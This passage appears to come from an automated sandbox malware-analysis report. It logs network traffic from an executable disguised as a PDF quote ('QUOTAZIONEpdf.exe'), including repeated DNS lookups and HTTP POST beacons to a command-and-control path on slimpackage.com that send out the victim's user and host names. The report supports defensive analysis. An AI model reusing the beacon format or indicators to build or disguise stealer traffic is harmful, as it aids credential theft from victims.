              Jan 14, 2022 09:53:13.657711029 CET8049763104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:13.657744884 CET8049763104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:13.657892942 CET4976380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:13.657965899 CET4976380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:13.782521009 CET8049763104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:15.011467934 CET4976480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:15.143964052 CET8049764104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:15.144073963 CET4976480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:15.147551060 CET4976480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:15.271928072 CET8049764104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:15.271997929 CET4976480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:15.396617889 CET8049764104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:15.406161070 CET8049764104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:15.406176090 CET8049764104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:15.406301022 CET4976480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:15.406326056 CET4976480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:15.552254915 CET8049764104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:16.545974970 CET4976580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:16.670469046 CET8049765104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:16.670805931 CET4976580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:16.674288988 CET4976580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:16.798710108 CET8049765104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:16.798804998 CET4976580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:16.923161030 CET8049765104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:16.934175968 CET8049765104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:16.934349060 CET4976580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:16.934357882 CET8049765104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:16.934406996 CET4976580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:17.059601068 CET8049765104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:18.104587078 CET4976680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:18.227161884 CET8049766104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:18.227278948 CET4976680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:18.230034113 CET4976680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:18.352457047 CET8049766104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:18.352592945 CET4976680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:18.475158930 CET8049766104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:18.484214067 CET8049766104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:18.484339952 CET8049766104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:18.484441042 CET4976680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:18.484498024 CET4976680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:18.607786894 CET8049766104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:19.717921972 CET4977080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:19.840317011 CET8049770104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:19.840572119 CET4977080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:19.843821049 CET4977080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:19.966356993 CET8049770104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:19.966540098 CET4977080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:20.089190960 CET8049770104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:20.097187996 CET8049770104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:20.097322941 CET8049770104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:20.097629070 CET4977080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:20.097656965 CET4977080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:20.220742941 CET8049770104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.047007084 CET4977180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:21.171355963 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.171902895 CET4977180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:21.176589966 CET4977180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:21.302092075 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.303132057 CET4977180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:21.427753925 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.435849905 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.435897112 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.436203003 CET4977180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:21.561022043 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:22.666246891 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:22.790328979 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:22.790483952 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:22.793267965 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:22.917289019 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:22.920172930 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:23.113514900 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:23.150387049 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:23.150677919 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:23.150793076 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:23.296163082 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:23.420478106 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.120821953 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.246565104 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.246664047 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.250387907 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.374768019 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.374854088 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.500363111 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.508188009 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.508251905 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.508382082 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.508457899 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.635023117 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.503109932 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:26.625806093 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.625920057 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:26.628571033 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:26.751311064 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.751445055 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:26.873924017 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.881258965 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.881376028 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:26.881400108 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.881453037 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:27.004054070 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:27.943618059 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.066205978 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:28.066376925 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.069977045 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.194497108 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:28.194595098 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.317151070 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:28.325772047 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:28.325805902 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:28.325910091 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.325938940 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.448967934 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.306583881 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.431618929 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.435159922 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.435189962 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.563728094 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.567574978 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.692378044 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.699652910 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.699667931 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.700038910 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.700052977 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.824692011 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.249636889 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.372044086 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.373085976 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.376585007 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.498994112 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.501925945 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.624532938 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.632582903 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.632626057 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.632708073 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.632745028 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.755970955 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:34.668543100 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:34.793478012 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:34.793773890 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:34.797107935 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:34.921138048 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:34.921205997 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:35.045180082 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:35.055516958 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:35.055536985 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:35.055625916 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:35.055655956 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:35.179922104 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.390980959 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.514982939 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.515525103 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.518335104 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.642352104 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.642458916 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.766614914 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.778532028 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.778564930 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.778651953 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.778692007 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.903242111 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:42.339562893 CET4981580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:42.463573933 CET8049815104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:42.463762999 CET4981580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:42.966613054 CET4981580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:43.100037098 CET8049815104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:43.102488041 CET4981580192.168.2.3104.223.93.105

              UDP Packets


              DNS Queries

              Jan 14, 2022 09:54:10.560174942 CET192.168.2.38.8.8.80x389Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:14.424412966 CET192.168.2.38.8.8.80xd0beStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:16.826210022 CET192.168.2.38.8.8.80x8155Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:20.161289930 CET192.168.2.38.8.8.80xfb07Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:22.129714012 CET192.168.2.38.8.8.80x2293Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:24.605570078 CET192.168.2.38.8.8.80xf44eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:25.971417904 CET192.168.2.38.8.8.80x85e0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:27.306365967 CET192.168.2.38.8.8.80x50f2Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:28.596005917 CET192.168.2.38.8.8.80xebb1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:30.029385090 CET192.168.2.38.8.8.80x1a9aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:31.352067947 CET192.168.2.38.8.8.80x371eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:32.648261070 CET192.168.2.38.8.8.80xf39eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:34.090576887 CET192.168.2.38.8.8.80x1648Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:35.436048031 CET192.168.2.38.8.8.80x4a4bStandard query (0)slimpackage.comA (IP address)IN (0x0001)

              DNS Answers


              HTTP Request Dependency Graph

              • slimpackage.com

              HTTP Packets

              Session ID   Source IP     Source Port   Destination IP   Destination Port   Process
              0            192.168.2.3   49742         104.223.93.105   80                 C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp                             kBytes transferred   Direction   Data
              Jan 14, 2022 09:52:38.800709009 CET   1104                 OUT         POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 190
              Connection: close
              Jan 14, 2022 09:52:38.925797939 CET   1105                 OUT         Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: 'ckav.ruhardz910646DESKTOP-716T771k08F9C4E9C79A3B52B3F739430ajSHF
              Jan 14, 2022 09:52:39.061507940 CET   1105                 IN          HTTP/1.1 404 Not Found
              Date: Fri, 14 Jan 2022 08:52:37 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID   Source IP     Source Port   Destination IP   Destination Port   Process
              10           192.168.2.3   49752         104.223.93.105   80                 C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp                             kBytes transferred   Direction   Data
              Jan 14, 2022 09:52:54.669015884 CET   1121                 OUT         POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:54.793697119 CET   1121                 OUT         Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:54.926312923 CET   1122                 IN          HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:53 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              22192.168.2.349766104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:18.230034113 CET1161OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:18.352592945 CET1163OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:18.484214067 CET1163INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:17 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              23192.168.2.349770104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:19.843821049 CET1166OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:19.966540098 CET1167OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:20.097187996 CET1167INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:19 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              24192.168.2.349771104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:21.176589966 CET1168OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:21.303132057 CET1168OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:21.435849905 CET1168INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:20 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              25192.168.2.349772104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:22.793267965 CET1169OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:22.920172930 CET1170OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:23.150387049 CET1170INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:21 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              26192.168.2.349773104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:25.250387907 CET1171OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:25.374854088 CET1171OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:25.508188009 CET1171INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:24 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              27192.168.2.349775104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:26.628571033 CET1245OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:26.751445055 CET1251OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:26.881258965 CET1298INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:25 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              28192.168.2.349781104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:28.069977045 CET1431OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:28.194595098 CET1463OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:28.325772047 CET1465INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:27 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              29192.168.2.349789104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:29.435189962 CET1800OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:29.567574978 CET1910OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:29.699652910 CET1912INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:28 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.349745104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:43.225955009 CET1109OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
